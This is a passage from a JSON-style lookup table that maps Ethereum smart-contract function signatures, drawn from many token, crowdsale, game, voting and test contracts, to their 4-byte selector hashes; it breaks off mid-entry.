"getPongAddress()": "0xfab43cb1", "EndowmentRetriever()": "0xf4d94699", "getPongvalConstant()": "0x40193d17", "getPongvalRemote()": "0x3af94817", "getPongvalTransactional()": "0xfb5d5729", "returnToOwner()": "0x8ecc0950", "returnIt()": "0x5ca8bc52", "rent()": "0x82996d9f", "costs()": "0x776d62f6", "open()": "0xfcfff16f", "setTimeBlock(uint256)": "0x224993c2", "endPoll()": "0x8d99b2eb", "feeDivisor()": "0x9a36f932", "vote(string)": "0xfc36e15b", "payOneTimeFee()": "0x1277e24f", "NewPoll(string,string,uint256,uint256)": "0x00100a18", "calculateRewards(uint256[3][3])": "0x93c94acb", "finishSpin()": "0x934354e7", "startSpin()": "0xac6bc853", "placeBet(bool[],uint256,uint256)": "0xeec3cb41", "startGame()": "0xd65ab5f2", "setRNG(address)": "0x3b84edbd", "Slots()": "0x7cc48875", "storeHeaderWithFee(bytes,int256,address)": "0x540cafe0", "storeHeader(bytes,address)": "0x6ebf10fe", "storeBlockWithFee(bytes,int256)": "0xcef887b0", "storeBlockHeader(bytes)": "0x2b861629", "processTransaction(bytes,uint256)": "0x1c0b6367", "BitcoinProcessor(address)": "0xf77a0923", "sha(uint256,uint256)": "0xc37ff3d9", "getProof(uint256,uint256,uint256)": "0x28cc413a", "getPendingBlock(uint256)": "0x33637d5a", "getStake(uint256,uint256)": "0xa0befa94", "getDeposit(uint256,address)": "0x9f489e4e", "declareVictor(uint256,uint256)": "0xf869b11a", "finalize(uint256,uint256)": "0xb6013cef", "respond(uint256,uint256,uint256,uint256)": "0xab09ee80", "challenge(uint256,uint256,uint256,bool)": "0x3c0870ae", "acceptChallenge(uint256,uint256,uint256)": "0x43114842", "newChallenge(uint256,uint256)": "0x201dcd7a", "deposit(uint256,uint256)": "0xe2bbb158", "initBlock(uint256)": "0x9dafbc13", "buyNumber(uint256)": "0x4b729aff", "testChallengeFinalize()": "0xea2ea847", "testResultNotZero()": "0xd992bd5b", "testT()": "0x11f72496", "t()": "0x92d0d153", "getProof()": "0x5c5d625e", "respond(uint256)": "0xa991cb0e", "eatUnicornWithoutCorn()": "0x10867877", "eatUnicornsAlive(uint256)": "0xa1e95792", "eatUnicorns(uint256)": "0x5b303e16", "eatUnicornsAlive()": "0x4b06fb28", "eatUnicorns()": "0xbd8b452e", "burnUnicorns()": "0x78c2c849", "getLevitatingKittens(bytes32,uint64)": "0xfeb50430", "getFlyingUnicorns(bytes32,uint64)": "0xc9aa71b8", "getLevitatingBirds(bytes32,uint64)": "0x50fe533b", "getLevitatingUnicorns(bytes32,uint64)": "0x13831693", "auctionBid(bytes32)": "0xf747a5eb", "auctionCancel(bytes32)": "0xe2acf75d", "buyNow(bytes32)": "0xd7ad4931", "feeCollector()": "0xc415b95c", "claimEther(address,uint256)": "0xbfcf63b0", "forceRelease(bytes32)": "0x9bdd7cdb", "auctionFinalize(bytes32)": "0x7c72e273", "releaseName(bytes32)": "0x71c79588", "setBuyNowListing(bytes32,uint256,bool)": "0x663e90d9", "auctionStart(bytes32,uint256,uint256)": "0x4deb68a3", "admins(uint256)": "0x14bfd6d0", "addName(string)": "0x11456b47", "trading()": "0xec44acf2", "getNode(uint256,uint256)": "0xe2dede94", "decimalPlaces()": "0xe1725c92", "sizeOf(uint256)": "0xd07866d2", "buy(uint256,uint256,bool)": "0xc3434883", "getPriceVolume(uint256)": "0x975289fd", "setTrading(bool)": "0x8f70ccf7", "spread(bool)": "0x8c3f914a", "contractBalance()": "0x8b7afe2e", "sell(uint256,uint256,bool)": "0x8ab1a5d4", "numOrdersOf(address)": "0x836e4158", "getOpenOrdersOf(address)": "0x6dee2032", "getAmount(uint256,address)": "0x42da3b6b", "getBook()": "0x3b0c197e", "etherBalanceOf(address)": "0x179fc99f", "attestToContract(uint256,bool,string)": "0xfa3559f7", "addContractWithInfo(string,string)": "0xa9d0ddc7", "unsetEndorsement(address,uint256)": "0xd7789a9f", "unsetClaim(uint256)": "0xa3a48785", "setEndorsement(address,uint256,uint256)": "0xa1bdd146", "setClaim(uint256,uint256)": "0xa16c6a73", "checkEndorsement(address,uint256,address)": "0x598aa1fc", "checkClaim(address,uint256,uint256)": "0x52c98e33", "chainIDSeed()": "0x858c7559", "createNewChain(bytes)": "0x590a4595", "postMessage(bytes32,bytes)": "0x482f63b0", "chainLastMessageHash(bytes32)": "0x224ccc49", "_rewardWinners(string,uint8,address[])": "0xfedc2a28", "getCurrentCompetitionValues(string)": "0xc91540f6", "getPlayersFromCompetition(string,uint8)": "0x916dbc17", "getCompetitionValues(string,uint8)": "0x8f30435d", "getSeedAndState(string,address)": "0x8d909ad9", "_startNextCompetition(string,uint32,uint88,uint8,uint8,uint16,uint64,uint32,bytes32,uint32[])": "0x71bde852", "start(string,uint64,uint8,uint32)": "0x70de8c6e", "_setOrganiser(address)": "0x656104f5", "increaseJackpot(string)": "0x59a4669f", "getPlayerSubmissionFromCompetition(string,uint8,address)": "0x569aa0d8", "submit(string,uint64,uint32,uint32,bytes32)": "0x49593f53", "_setDepositAccount(address)": "0x1f9ea25d", "_setBugFixVersion(string,uint32,bytes32,uint32)": "0x04029f23", "getCommunityDescription(uint256)": "0xfcc101ba", "getCommunityTaxes(uint256)": "0xfba6651c", "resignFromCommunity()": "0xf82c2301", "kickOutCommunity(address,uint256)": "0xf6df26d2", "getMemberLinks(address)": "0xf47efbca", "vote(uint256,int8)": "0xee650248", "like(address)": "0xe465c465", "getCommunityManagement(uint256)": "0xe05e3028", "getMemberStatus(address)": "0xdde8535f", "getMemberWallet(address)": "0xd95ab72d", "getIfVoted(uint256,address)": "0xd21cbffc", "proposeAcceptanceAsMember(uint256)": "0xbfb04c60", "modifyCommunityInfo(uint256,string,string,string,string)": "0xbcabb54c", "joinCommunity(uint256)": "0xb122a0ef", "registerSystem(string,string,string,string)": "0xad71c687", "newProposal(uint256,string,string,uint256,uint256)": "0xa5496e60", "getCommunityRates(uint256)": "0x9431e412", "getMemberCredit(address)": "0x8b343e8f", "getTotals()": "0x84e10a90", "endorseCredit(address,uint256,uint256)": "0x721a1f57", "transferCommunityBank(uint256,address)": "0x71efeff1", "payment(address,uint256)": "0x67a09c23", "getMPbyIndex(uint256)": "0x52ea5667", "transferSysAdmin(address)": "0x526b91d1", "getCommunitybyIndex(uint256)": "0x519a078f", "getProposalVotes(uint256)": "0x47c66140", "modifyMemberInfo(string,string,string,string)": "0x36b33415", "transferCommunityCommune(uint256,address)": "0x3500a48d", "modifyCommunityRates(uint256,uint256,uint256,uint256,uint256,bool,uint256,uint256,uint256)": "0x33b85b73", "modifyCommunityTaxes(uint256,uint256,uint256,uint256)": "0x2925ffc2", "sysAdmin()": "0x1b7db340", "notLike(address)": "0x197f3c29", "createCommunity(string,string,string,string,uint256,uint256,uint256,uint256,uint256,uint256,uint256,bool,uint256,uint256,uint256)": "0x0a90c704", "acceptAtCommunity(address,uint256)": "0x0456860a", "reward(uint32[],address[])": "0x98e7ea43", "run(string)": "0x9352fad2", "ipfsAttributeLookup(address)": "0x884179d8", "setAttributes(bytes)": "0x6737c877", "MINTING_LIMIT()": "0x14c7763b", "votingDeadline()": "0x036ee850", "HVZSupply()": "0x3b9927df", "ETHRaised()": "0x2ac87112", "profitSharing()": "0x8832243a", "createTokenToMarket2018()": "0x8d000903", "ICOweek4End()": "0xecd7df06", "paymentTokenAddress()": "0xafb18fe7", "numberOfSuccessfulPings()": "0x5864c56c", "currentSwapRate()": "0x5334c231", "easyMineToken()": "0xb956a8a6", "CurrentGoldPercentIncrease()": "0xea9c2859", "getCurrTeamSizes()": "0x9f73dbc0", "getGiftsCounter()": "0x3f332792", "maxId()": "0xc5ea3c65", "candyLand()": "0x50ee6de2", "roundFiveTime()": "0xd58b8282", "minJump()": "0xcf2d03ae", "alt()": "0xb6136dca", "hashFirst()": "0x6b486818", "isAllowedToPurchase()": "0x0035a45c", "canUpdateBackWindowAdjustmentRatio()": "0xacbdea6c", "blockTransfer()": "0x6b28d7a2", "currentMinPurchase()": "0x00fdc73f", "numberOfInvestors()": "0x1af2c9fd", "remainCap()": "0x63b57e34", "yearlyFee()": "0xbc7dbc0d", "grandConsolationRewards()": "0x39419d60", "channel_api()": "0xd94123b8", "hivePerUSD()": "0xf8742a14", "BONUS_4_DAYS()": "0x6fcac869", "bountyTokensVault()": "0xdc165652", "ethertoteDevelopmentWallet()": "0xdba0e9bb", "mintAmount5()": "0xa174c4c6", "MAXIMUM_BET_SIZE()": "0xf94a360d", "depositAmount()": "0x419759f5", "allower()": "0xdd449a83", "startCloseSale()": "0xf27c24ed", "Description()": "0x8191745f", "phase4Price()": "0xba1af80f", "TotalPoSRequests()": "0x17759493", "Reserve()": "0xcda95d80", "fundDigitalMarket()": "0x13f20d76", "LockEDUTeam()": "0x2c64b05f", "maxArtworks()": "0xa163c090", "mintStart3()": "0x404cf932", "communityLock()": "0x6c8b4e60", "getNewsContractAddress()": "0xeaa40283", "SALE_TOKENS()": "0x692d9ee5", "SUPPLY_FOR_BOOUNTY()": "0x9a721302", "rateSecondWeek()": "0x9c472c70", "whale()": "0xa6a1858f", "GDCAcc05()": "0xfc078bd4", "fundsVault()": "0xb6cb7f41", "TeamSum()": "0x7cfb1e66", "fundPreIco()": "0xbc09b5ec", "team1Token()": "0xe9b6953b", "zKill()": "0xffe3c6fd", "rdCollectorAddress()": "0xc270ce28", "preico_startdate()": "0xc2d9c196", "reserveAccount()": "0xdc184e70", "removeOwners()": "0x4782f6fc", "delayedPayments()": "0xdc391176", "dnnHoldingMultisig()": "0x9199a8bb", "charityCount()": "0x91329493", "get_released_by_manager()": "0x6a2a4c06", "TotalFee()": "0x4d3314f4", "transferToPool()": "0xfe110116", "ccEndTime()": "0x9a5f17ee", "yearSeconds()": "0x87ae0dbe", "commission_rate()": "0x188fdbdc", "LaunchPartnersAddress()": "0x50500fac", "MIN_DEPARTURE_LIM()": "0x4ccbd06b", "team2Balance()": "0x96be8878", "canary()": "0x2591432d", "rcnFund()": "0x91e1397d", "getLendTokenBalance()": "0xe02bcd3e", "MINIMUMINVESTMENTSALE()": "0x94f3217c", "startPreICOStage2()": "0x8de5104b", "mainSale_WeiRaised()": "0xae1f14ca", "PreICODays()": "0x7d9fc342", "stopAcceptingDonation()": "0x519a73c3", "minPlay()": "0xedeeb143", "overLimit()": "0xe06e0e43", "lastChanceEnabled()": "0xc46f3e25", "reserveFund()": "0xb7f92b71", "openAirDrop()": "0x68f04bbb", "agencyOwner()": "0x0fab14e8", "TOKEN_PRICE()": "0xd2d8cb67", "failSafe()": "0x0bc6c96e", "MIN_CONTRIBUTION_AMOUNT()": "0x0c49c0a2", "BONUS_WL()": "0xc4697667", "betCount_()": "0xeeda6357", "TOTAL_LARE_FOR_SALE()": "0xa68f0bc1", "preSaleFirstEndDate()": "0xabe75844", "airdroptotal()": "0x16b2cd34", "PREMIUM_TYPE_COUNT()": "0xd2b001fb", "unlockEmission()": "0x49a0c976", "slavenAdress()": "0xcfb75c92", "safeWithdraw()": "0x7fd42617", "logOut()": "0x4be422ae", "logIn()": "0x377b47a3", "convertToDEF(uint256)": "0x15bc9441", "convertToATK(uint256)": "0xd843e721", "burnLeftovers()": "0xe11398e8", "tokenMultiplier()": "0xba3f5a12", "isContract(address,address)": "0xa1775db5", "EtherBattleCoin()": "0x843cbae4", "STQPreICO3TestHelper(address,address[])": "0x9ea23080", "hasMemberAccess(address)": "0x2f991b5a", "hasManagerAccess(address)": "0x42e7ba7b", "hasDirectorAccess(address)": "0xda8267e3", "hasOwnerAccess(address)": "0xbd14fe3e", "SpiceControlled(address)": "0x211ff90c", "test_threeInvalidAssertFalse()": "0xc11645af", "test_twoInvalidAssertFalse()": "0x9ce80efc", "test_oneInvalidAssertFalse()": "0x2e028287", "test_oneTrueFalse()": "0x2833747f", "test_threeValidAssertFalse()": "0x9e80b731", "test_twoValidAssertFalse()": "0xa0a7131c", "getNumberOfGames()": "0xdd2f4ebd", "getGameDetails(uint256)": "0x1b31abda", "endGame(bool,uint256)": "0xc08a86b1", "playGame(uint256,uint256)": "0x34825a23", "newGame(uint256,bool,uint256)": "0xc5d61ad0", "acquire()": "0xa7134f73", "getBrehonContract(bytes32)": "0x56b9e9de", "newBrehonContract(address,address,uint256,bytes32,address,uint256,uint256,address,uint256,uint256,address,uint256,uint256)": "0x8b1cffe0", "BrehonContractFactory()": "0x3a4cb854", "changeBlock(bool)": "0x137157c0", "init(int256)": "0x21180722", "subtract(int256)": "0xae0f6166", "add(int256)": "0x87db03b7", "UpdateMinFee(uint256)": "0x99e2ab0e", "WithdrawFee()": "0xa472969c", "Extend(bytes32)": "0x070545d8", "ChangeOwner(bytes32,address)": "0x1ef17972", "ChangeIp(bytes32,bytes32)": "0x9b285582", "ChangeTarget(bytes32,address)": "0x16c6ec92", "CloseAuction(bytes32)": "0x7da0399a", "Register(bytes32,address)": "0x1082cda1", "Resolve(bytes32)": "0xf3c16e54", "fundCampaign(uint256)": "0x92bd38bc", "getCampaign(uint256)": "0x5598f8cc", "getBalancesForTeam(address)": "0x4c5cbe9a", "getTeamNameForAddress(address)": "0x0017e1cf", "getTeamAddresses()": "0x89e52771", "addTeam(address,string)": "0xda73630e", "submitAnswer(address,uint256)": "0xe82a7d8d", "makeGuess(uint256)": "0x22666da6", "checkNumber(uint256)": "0xeb0e9240", "updatePayoutAddress(address)": "0x56200819", "Patronage(string,address,address)": "0x807283df", "hasApproved(address)": "0xc73992e4", "withdrawSecond()": "0xc3f67cde", "auditConfirm()": "0x4f2cd9cc", "withdrawFirst()": "0xff655320", "closeFailedInstallationAndWithdraw()": "0x1a3538f3", "closeFailedVotingAndWithdraw()": "0xd6f6b6e7", "withdrawBeforeVoting(uint256)": "0x9ae9ff6a", "Voting(bool)": "0x6635da25", "assignRoles()": "0x14eb75bb", "assignTestAddresses(bool)": "0xe7e00d1d", "tokenFactory()": "0xe77772fe", "transfersEnabled()": "0xbef97c87", "creationBlock()": "0x17634514", "parentSnapShotBlock()": "0xc5bcc4f1", "parentToken()": "0x80a54001", "unblock(address,bytes32)": "0x73221a55", "block(address,bytes32)": "0xd4b182d4", "updateDescriptiveInformation(address,string,string,string,string)": "0x9b2b0031", "register(address,string,string,uint256,string,string,bytes32,address,address)": "0xd88a3af9", "isCitizen(address)": "0xf3caad03", "isGuardian(address)": "0x0c68ba21", "setGuardian(address,bool)": "0x2b8a1c5a", "changeSafetyLimit(uint256)": "0x3f7d5361", "Entropy()": "0x40c48dfa", "getRouteSize()": "0xd5aa1a26", "getRouteNameByIndex(uint256)": "0xe3e1dcb3", "setRoute(string,address,bool)": "0xd1c4c206", "getRoute(string)": "0x1b5f03a6", "getSelection(uint256)": "0x626fd353", "getQuestion()": "0xeff38f92", "election(string,string,string,string)": "0x10253fec", "verify(address,string)": "0xe8fc9273", "store(bytes32)": "0x654cf88c", "testBazMethod(uint32,bool)": "0x9f55857d", "testBazMethodId()": "0xcc255b38", "testHello()": "0xc97c6353", "FooAbi(address)": "0xebb32c65", "testSupplyOf()": "0x197425c4", "testFreeSpace()": "0x6b584b10", "testInitialLedgerBalance()": "0xc1009f1b", "setWebsite(string)": "0xf87f44b9", "burnTokens(address,uint256)": "0x0d1118ce", "isController(address)": "0xb429afeb", "setLOCdata(string,address,int256,address,uint256,string,uint256)": "0x8aab811e", "buyPixel(uint256,bytes32)": "0xfc55c8d6", "TurnBasedGame(bool)": "0xeca49641", "rejectCurrentPlayerDraw(bytes32)": "0x10cb4d64", "testThrowsTransferDisableNotEnabled()": "0x98024f18", "testThrowsTransferEnableNotTransferable()": "0x1da6822c", "testThrowsSetNotTransferableNotOwner()": "0xb463bcde", "testThrowsSetNotRetractableNotOwner()": "0xe1569f6b", "testThrowsSetEnforceRevisionsNotOwner()": "0x67080f6e", "testThrowsSetNotUpdatableNotOwner()": "0xce19419b", "testThrowsDisownNotOwner()": "0xbc0e7adb", "testThrowsRetractNotOwner()": "0x869b3f6a", "testThrowsRestartNotOwner()": "0x6b6a53fa", "testThrowsRetractLatestRevisionNotOwner()": "0xa6e16ba2", "testThrowsUpdateLatestRevisionNotOwner()": "0x334ef224", "testThrowsCreateNewRevisionNotOwner()": "0x69b144eb", "getContentByData(address,uint256,string,string)": "0x8eaa1e29", "getContentTimestamp(uint256)": "0xbbed7177", "getChannelSize(uint256)": "0xebb741cb", "getOverallSize()": "0x8023ffbd", "publish(string,string,string,address)": "0xcc70bb1a", "Publisher()": "0x7620a65b", "removeAuthorization(address)": "0x94f3f81d", "addAuthorization(address)": "0x35b28153", "SignatureValidator(address)": "0x560bb612", "addSignature(string)": "0x652f1f16", "error(string)": "0x24c93343", "transferFrom(address,address,uint256,string)": "0x1af716ba", "transfer(address,uint256,string)": "0x56b8c724", "hasAccess(address)": "0x95a078e8", "revokeAccess(address)": "0x85e68531", "grantAccess(address)": "0x0ae5e739", "burnFunds(uint256)": "0x1995333b", "EspCoin()": "0x14cbdb54", "BasicRegulator(address,uint256,uint256)": "0x07b2779f", "acceptTransfer(address,address,uint256)": "0x3395dc70", "getFee(address,address,uint256)": "0xbe3945e4", "RegulatorIfc(address)": "0xbaccc92b", "checkAccountState(address)": "0x5c7c9aa4", "setKYC(address)": "0x483a83df", "setRegulator(address)": "0xcde0a4f8", "set(uint256,uint256,bool[],uint256[])": "0x364ea9e7", "concatUInt(uint256)": "0x69d01268", "concatString(string)": "0x83d51a38", "set(string)": "0x4ed3885e", "selector()": "0xea3d508a", "isAlphaNumeric(bytes1)": "0xfd958695", "isAlpha(bytes1)": "0xfadc51cf", "isDigit(bytes1)": "0x342454c7", "isAlphaLower(bytes1)": "0x9a571d9f", "isAlphaUpper(bytes1)": "0x2973e372", "isUnderscore(bytes1)": "0x7fdc8290", "isAlphaNumeric(string)": "0xcabb3a3a", "sum(uint256[])": "0x0194db8e", "getSignature(bytes4,uint256)": "0x1baaeb91", "getSignature(bytes32)": "0xc4b14e0b", "getAllSignatureHashes(bytes4)": "0x2324c67c", "getSignatureHash(bytes4,uint256)": "0xe02426c1", "numSignatures(bytes4)": "0xa6cbcdd5", "isKnownSelector(bytes4)": "0x6ba0b4f2", "isKnownSignature(string)": "0xd8c34127", "addSignature(string,uint256[],uint256[],uint256[],bool[],uint256[])": "0x18921de4", "isValid()": "0xbb5d40eb", "getArrlist(uint256,uint256)": "0x0f3a1412", "getArgument(uint256)": "0x22bc3b8e", "set(string,uint256[],uint256[],uint256[],bool[],uint256[])": "0xd1b1a22b", "set(bool,uint256)": "0xaa237e21", "repr()": "0x089d5c4a", "testThrowCreateWithNonceRetracted()": "0x81ebdeea", "testCreateWithNonce()": "0x2aee19c7", "testThrowCreateWithNonceExistingNonce()": "0x67387d6b", "createWithNonce(bytes32,bytes)": "0x6d1da953", "getCredRanksByContents(address,uint256[])": "0xf4dbeb9d", "getContentsByRanks(address,uint256,uint256,uint256)": "0x9919b1cc", "getChannelsByRanks(address,uint256,uint256)": "0x3b9901cc", "getNumContents(address,uint256)": "0x2ae87a70", "getContentByRank(address,uint256,uint256)": "0xc01706dd", "getContentRank(address,uint256)": "0x1d7e1f68", "getContentCred(address,uint256)": "0x771ad635", "getNumChannels(address)": "0xffe34512", "getChannelRank(address,uint256)": "0x5a1cc358", "getChannelCred(address,uint256)": "0x66099706", "getChannelByRank(address,uint256)": "0x0a4caed0", "index(uint256,address,uint256,uint256)": "0xd644e356", "getNumContents(uint256)": "0x7e904a48", "getContentTimetamp(uint256)": "0xa5b9e922", "getContentChannel(uint256)": "0x9ea1b79d", "getContentParent(uint256)": "0x05de4f07", "getContentAccount(uint256)": "0x60dccd89", "getContentIndexedAccountCred(uint256,address,address)": "0x738ddabe", "getChannelByName(string)": "0xccbda1af", "sign(uint256,uint256,address)": "0xd5f37f95", "post(string,string,string,uint256,uint256,address)": "0x2e06c756", "CredSign()": "0x446fbcd1", "create(bytes4,bytes)": "0x30a24abd", "testSetNotTransferable()": "0xa039e3c7", "testSetNotRetractable()": "0xac3e6b2f", "testSetEnforceRevisions()": "0xee0dc478", "testSetNotUpdatable()": "0xad544dcb", "testDisown()": "0xda5c0a7c", "testThrowsDisownNotTransferable()": "0x804e11dc", "testRetract()": "0x0af4626d", "testThrowsRetractNotRetractable()": "0xd96e5565", "testThrowCreateRetracted()": "0xcaab0acc", "checkJuryVoted(address)": "0xf25e34a9", "getUserType(address,address)": "0xad6eff22", "returnContributionsToTheSponsors()": "0x0e714202", "disqualifyTeam(address)": "0x739890f0", "payoutPrizes(address[])": "0x66ac8075", "vote(address[])": "0xed081329", "contributeToPrizePool(string,string,string)": "0x1196fb60", "registerJuryMember(string,address)": "0x653f23f8", "registerTeam(string,address,string,bool)": "0x6305d010", "switchToNextPeriod()": "0xa432e6d6", "DecenterHackathon()": "0x1605a889", "getSnailmasterReq()": "0x286eab15", "becomeSnailmaster()": "0xfe3c5d80", "SpermLabs()": "0xcfc220b6", "MarketCoin()": "0x349718ed", "ExpeditingToken()": "0x81042183", "PGE02CH()": "0x20885d9e", "adminMint(address,uint256)": "0xe58306f9", "CompositCoinCrowdsale(uint256)": "0x95693aad", "claimTokensICO(address)": "0xb7c42cf0", "setWhiteListAddresses(address)": "0x625cbb23", "claimrefund(address)": "0x1b3efd15", "enablerefund(address,address)": "0x72ec1993", "bonuscal()": "0x12ac4a2e", "IDMONEY()": "0x03f10bff", "withdrawProfit(address,uint256)": "0xd35c9a07", "saleTokens()": "0xb0b9603b", "unBlockExternalTransfer()": "0x4973dd25", "blockExternalTransfer()": "0xf54011f5", "giveAdditionalTokens(address,uint256)": "0xaa55a1a2", "giveAdvisorsTokens(address,uint256)": "0xe77e02d3", "giveProgectTokens(address,uint256)": "0x874252ef", "giveBountyTokens(address,uint256)": "0xf39bfb52", "returnTokensFromHoldAdditionalAddress(uint256)": "0xba7d619c", "returnTokensFromHoldAdvisorsAddress(uint256)": "0x9b7defe3", "returnTokensFromHoldBountyAddress(uint256)": "0x26a9408c", "returnTokensFromHoldProgectAddress(uint256)": "0xa2596ebe", "setWhitelisterAddress(address)": "0x1662da6a", "FlyCareTokenSale(address,uint256,uint256,uint256,uint256,uint256,uint256,address,uint64[5])": "0x1385053e", "tokenCapReached()": "0xfcca4040", "TokenCappedCrowdsale(uint256,uint256,uint256)": "0x9a772bce", "FlyCareToken()": "0x8bbf7330", "Blockchain()": "0x2f35a71e", "CoiinToken(address)": "0x7d4da754", "StreamNetworkToken()": "0x1b67ab2b", "KuaiKanToken(uint256,string,uint8,string)": "0x246f0ca4", "Oratium()": "0x72d16358", "createPersonalTime(address,uint256)": "0x60699d92", "createJaroSleep(address,uint256)": "0x356d4a3a", "_closeSale()": "0x7ea1b7ba", "appendContribution(address,uint256)": "0xf8d599eb", "_buyTokens(address,uint256,uint16)": "0xe1b9ed9d", "coupon(uint256,uint16,uint8,bytes32,bytes32)": "0x3ae9133d", "initialize(address,address,address,address)": "0xf8c8765e", "JetCoin()": "0x56b62e2d", "posMint()": "0x6ac54eb0", "setStakeStartTime(uint256)": "0xcc1b63d5", "WKToken()": "0x7b74644d", "CNNToken()": "0x783cc9dc", "CNNTokenBase(uint256,string,string,uint8)": "0xb81168b4", "setUSDPrice(uint256)": "0x147d959a", "SimpleToken(string,string,uint256,address)": "0xf3eb2445", "getLatestReading(string)": "0x329c095b", "saveReading(string,string)": "0x98b35e73", "getMeter(string)": "0x6a0fd45c", "addMeter(uint32,string,string)": "0x9727e379", "Readings()": "0x756b1140", "unlockProjectToken()": "0x4b534c48", "_lockProjectToken()": "0x2924f0dc", "lockOf(address)": "0x5a46d3b5", "GenexiToken()": "0xb18196f4", "KocoCoin()": "0xf0876747", "addInvestmentPreIco(address,uint256)": "0x1fdb5a2b", "setStartTimeIco(uint256,uint256)": "0xb92ddee6", "getPreIcoInvestment(address)": "0x6afb434f", "getPreIcoInvestor(uint256)": "0x553c6de9", "getPreIcoInvestorsCount()": "0x19216c4d", "distributeTokensPreIco(uint256)": "0x27f05e06", "calcTokenRate()": "0xcbefe55c", "sellTokensIco()": "0x9f654dd2", "sellTokensPreIco()": "0x25fced01", "isIco()": "0xff3a5eea", "isPreIco()": "0xbec17f69", "CurrentCrowdsale(uint256,uint256,uint256,uint256,address,address,address)": "0x95bb733b", "Whitelistable()": "0x3fa58b61", "burnFromAddress(address)": "0xf1c36ce0", "burnFromIco()": "0x98d5a1b1", "CurrentToken(address)": "0xc3800fdc", "getGladiatorCooldown(address)": "0xe74a5847", "Power()": "0xbcdac66f", "approvedAccount(address,bool)": "0x4ada3b32", "unlockAllTokens(bool)": "0x0fdc7956", "BodyMassIndex()": "0x229a336b", "Dist(address,uint256,address)": "0x851a61d7", "DigiPulse()": "0xbaa371d0", "newExitWallet(address)": "0x800d41a3", "newInvestWallet(address)": "0x4e5f8751", "newEnterWallet(address)": "0xa73e9837", "setNewWithdrawCommission(uint256)": "0xbbc620a8", "setNewInvestCommission(uint256)": "0x479e24e6", "addProperty(bytes32,bytes32,bytes32,bytes32,bytes32,uint256,bytes32,bytes32,uint256)": "0x966aa252", "listPersons()": "0x5d9fd8b0", "getPerson(bytes32)": "0xac28838b", "removePerson(bytes32)": "0x87f7cab9", "addPerson(bytes32,bytes32,bytes32,bytes32,uint256,bytes32,address)": "0x5f76e49a", "getPropertyCount()": "0x7326b901", "getpersonCount()": "0xb830b305", "RealEstate(uint256)": "0xb39e7bc1", "endInitialization()": "0xb397657d", "testTheMultipliers()": "0xac48fcbc", "testTheFirstMultiplier()": "0xf38b2ef0", "nextReward(uint256)": "0xa3cd2d78", "addToSet(uint256,uint256)": "0x26111ab2", "setIncludes(uint256,uint256)": "0x7cb9da88", "validateSet(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x69dded0e", "validateBoard(uint256[81])": "0xb56494c0", "compressBoard(uint256[81])": "0x01c5b2f0", "claimBoard(uint256[81])": "0x7705b6f4", "getEntry(uint256)": "0xbae78d7b", "addEntry(string,string)": "0x5ce308a7", "ChecksumDatabase(string,string,string)": "0xdbfb129e", "getWillData()": "0x033ba5d1", "setWillContents(address,bytes)": "0x5cecd728", "will()": "0x36321001", "adminRemoveRole(address,string)": "0x88cee87e", "adminAddRole(address,string)": "0xb25fa92c", "RBAC()": "0x52b5ff39", "send(address,bytes)": "0xc89acc86", "matchBytes32Prefix(bytes32,bytes,uint256,bytes)": "0xcd871b16", "oraclize_randomDS_proofVerify__returnCode(bytes32,string,bytes)": "0xf662a12a", "addJobContractMessage(address,address,address,string,uint256)": "0x3ea75e3d", "addMessage(address,address,address,string)": "0x0d16cba5", "userLoans(address,uint256)": "0xd8bad5bd", "newLoan(bytes32,bytes32,bytes32,address,uint256,uint256,uint256,uint256,uint256,uint256,address)": "0x4905c769", "onNewLoan(uint256,address,uint256)": "0x603c1370", "testInitial2of3()": "0xc6bc8dee", "testInitial2of2()": "0xeeaec245", "testInitial1of3()": "0x7bc4d6a6", "testDeployMultiSigWallet()": "0x2d7deae2", "partialWithdrawal(uint256)": "0xb0d65d29", "endOfSaleFullWithdrawal()": "0xd790dce7", "_mintTokens(int256,address,uint256)": "0xb706f78e", "changeCJTeamWallet(address)": "0x62027c1e", "MNTToken(address)": "0x5ed188c9", "MockDeed(address)": "0x2bcc79a7", "CORPAddress()": "0x97f8fee1", "CORAddress()": "0x9a388bd2", "ConsentFactory(string,address)": "0x545464ff", "getCompany()": "0x127810bc", "ConsentTemplate(string,string,uint256,string,string,string)": "0xf28109d1", "proceed()": "0x2a33fec6", "startRedeeming()": "0xdaf8f438", "finalize(address)": "0x4ef39b75", "retrieveEth(uint256,address)": "0x04deaeb5", "redeemTokens(string)": "0x7b05d785", "getCurrentTokenPrice()": "0xf751758b", "PXLToken(uint256,uint256,uint256,address,address)": "0x55b9b9cf", "getCreateUniverseParentPayoutDistributionHashValue()": "0x7f790b7b", "getCreateUniverseParentUniverseValue()": "0xde44bf01", "emissionLimit()": "0x6639dc8e", "setPercentage(uint256)": "0x5da4a1d3", "Commitment(address,address,address)": "0xd7546da7", "calculateVestedTokens(uint256)": "0x731a00f5", "grant(uint256)": "0x160e3f3d", "revoke()": "0xb6549f75", "slice(uint256[],uint256,uint256)": "0x5ac48043", "getBet()": "0x20835e8c", "getPlayer2()": "0x1bb6cb47", "getPlayer1()": "0x01ab2a66", "getGrid()": "0x134000c0", "checkGrid(uint8)": "0xdfbb4021", "makeMove(uint8)": "0x650271d2", "isPlayer1sTurn()": "0xa1687d31", "joinGame()": "0xd4f77b1c", "Connect4eth(address,address,uint256)": "0x78e4ca77", "BasicForecasting(address,uint256,address,address,address)": "0x315a0a09", "highSupport(address)": "0x12146222", "removeValidator(address)": "0x40a141ff", "addValidator(address)": "0x4d238c8e", "newStatus(address)": "0xeb87ec01", "removeSupport(address,address)": "0x0c1be377", "reportBenign(address)": "0xfd6e1b50", "reportMalicious(address)": "0xbfc708a0", "supportValidator(address)": "0x93fea3fc", "getValidators()": "0xb7ab4db5", "MajorityList()": "0x28de15b2", "getCandidates(bytes32)": "0x85b923ca", "EasyCrowdsale()": "0x79d00c5d", "EasyToken()": "0x3dbae017", "createPost(string,string,bytes32)": "0x5d10a60d", "createTopic(string,string,uint256)": "0x938f7064", "createForum(string)": "0xa232e64b", "vet(address,bool)": "0x7bbc33f0", "isVetted(address)": "0x09c4a273", "updateDescriptionHash(string)": "0x939a470e", "updateMeDao(address)": "0xdc9861db", "registerMeDao(address)": "0x2c8ab429", "get(address)": "0xc2bc2efc", "build_creature()": "0xa2bcee8b", "getSellAgents(uint256)": "0xcf225109", "RANGEEND_2()": "0x169ff375", "nextDiscountTTWTokenId1()": "0x4b530090", "vestingAgent()": "0x3a21cb9d", "CREATE_REPO_ROLE()": "0x5e1f3fa8", "bet_amount()": "0x5d0dd712", "phasePresale_To()": 